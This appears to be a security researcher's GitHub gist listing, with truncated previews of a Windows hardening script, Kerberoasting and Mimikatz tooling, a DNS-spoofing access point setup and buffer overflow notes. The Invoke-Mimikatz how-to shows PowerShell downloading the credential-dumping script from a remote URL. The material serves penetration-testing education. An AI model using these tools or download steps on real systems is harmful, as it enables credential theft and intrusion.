Jared Haight jaredhaight
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8"?> | |
| <unattend xmlns="urn:schemas-microsoft-com:unattend"> | |
| <settings pass="windowsPE"> | |
| <component name="Microsoft-Windows-International-Core-WinPE" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> | |
| <SetupUILanguage> | |
| <UILanguage>en-US</UILanguage> | |
| </SetupUILanguage> | |
| <InputLocale>0c09:00000409</InputLocale> | |
| <SystemLocale>en-US</SystemLocale> | |
| <UILanguage>en-US</UILanguage> |
jaredhaight
/ givingbacktoinfosec.md
Last active
January 28, 2018 13:34
Giving Back to Infosec Talk Resources
jaredhaight
/ windows_hardening.cmd
Last active
April 28, 2024 16:59
— forked from mackwage/windows_hardening.cmd
Script to perform some hardening of Windows OS.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| :: | |
| ::####################################################################### | |
| :: | |
| :: Change file associations to protect against common ransomware attacks | |
| :: Note that if you legitimately use these extensions, like .bat, you will now need to execute them manually from cmd or powershell | |
| :: Alternatively, you can right-click on them and hit 'Run as Administrator' but ensure it's a script you want to run :) | |
| :: --------------------- | |
| ftype htafile="%SystemRoot%\system32\NOTEPAD.EXE" "%1" | |
| ftype WSHFile="%SystemRoot%\system32\NOTEPAD.EXE" "%1" | |
| ftype batfile="%SystemRoot%\system32\NOTEPAD.EXE" "%1" |
jaredhaight
/ Remove-SlackFiles.ps1
Last active
June 18, 2018 22:11
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $token = '' # Get from: https://api.slack.com/custom-integrations/legacy-tokens | |
| $user = Invoke-RestMethod -Uri "https://slack.com/api/auth.test?token=$token" | |
| # Making sure we're on the right account. Thanks @veegr! | |
| $user | Select-Object Url, Team, User | format-list | |
| Write-Output "Is this the correct account?" | |
| $choice = Read-Host "[Y/N]" | |
| Switch ($choice) { | |
| Y {Write-Output "`nDeleting with great vengeance and furious anger`n"} | |
| N { |
jaredhaight
/ Intoducing Bruiser - Links.md
Last active
December 27, 2017 21:56
- Fireeye HammerToss PDF: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
- 7 Years of Dukes: https://labsblog.f-secure.com/2015/09/17/the-dukes-7-years-of-russian-cyber-espionage/
- RTM Banking malware: https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf
- Lowball Malware: https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html
- CloudAtlas malware: https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Invoke-Kerberoast.ps1 | |
| Author: Will Schroeder (@harmj0y), @machosec | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Credit to Tim Medin (@TimMedin) for the Kerberoasting concept and original toolset implementation (https://github.com/nidem/kerberoast). | |
| Note: the primary method of use will be Invoke-Kerberoast with various targeting options. |
jaredhaight
/ Simple_Wireless_AP
Created
April 8, 2016 01:05
Script and config files for setting up a simple AP in Kali
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #### INIT SCRIPT #### | |
| #!/bin/bash | |
| ######################################################### | |
| # # | |
| # * Make sure to update hostapd.conf to use the monitor # | |
| # interface (default is wlan0) # | |
| # * Add MACs of devices you are working with to the # | |
| # allowed_macs file # | |
| # * Add DNS entries you're spoofing to dns_entries # |
jaredhaight
/ buffer_overflow_notes.md
Last active
March 26, 2016 20:07
Some notes on Buffer Overflows. This supplements a presentation that I gave for Chaha.
- Stack: Location in RAM where the processor stores stuff (variables, functions, etc)
- Registers: Locations on the CPU where data is stored/processed.
- Good walk through here
- Tricks
- Sometimes the registers screen goes blank, to fix this by toggling the view (hit the "C" button)
- If you're searching for a memory address and it doesn't show up the first time, run the search again. Theres a bug in Immunity that causes this
jaredhaight
/ invoke-mimikatz_usage_example.ps1
Last active
January 31, 2016 18:11
At that last Charlotte Hackers (http://www.charlottehackers.com) I was asked about how to use invoke-mimkatz on an engagement. This is a brief howto.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This is broken out bit by bit to show whats going on | |
| # Here we point to the url for the raw ps1 file for invoke-mimikatz | |
| $mkatz_ps1_url = "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1" | |
| # Here we call the .NET framework to create a webclient object and download | |
| # the raw file from the url, assigning the contents of the file to the | |
| # $mkatz_dl var. | |
| $mkatz_dl = (New-Object Net.WebClient).DownloadString($mkatz_ps1_url) |
jaredhaight
/ Invoke-MimikatzSharp.cs.ps1
Created
December 22, 2015 15:34
Invoke-Mimikatz.cs.ps1 Invokes x86 or x64 Mimiktaz Inside of PowerShell Process
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Source = @" | |
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| using System.Security.Cryptography; |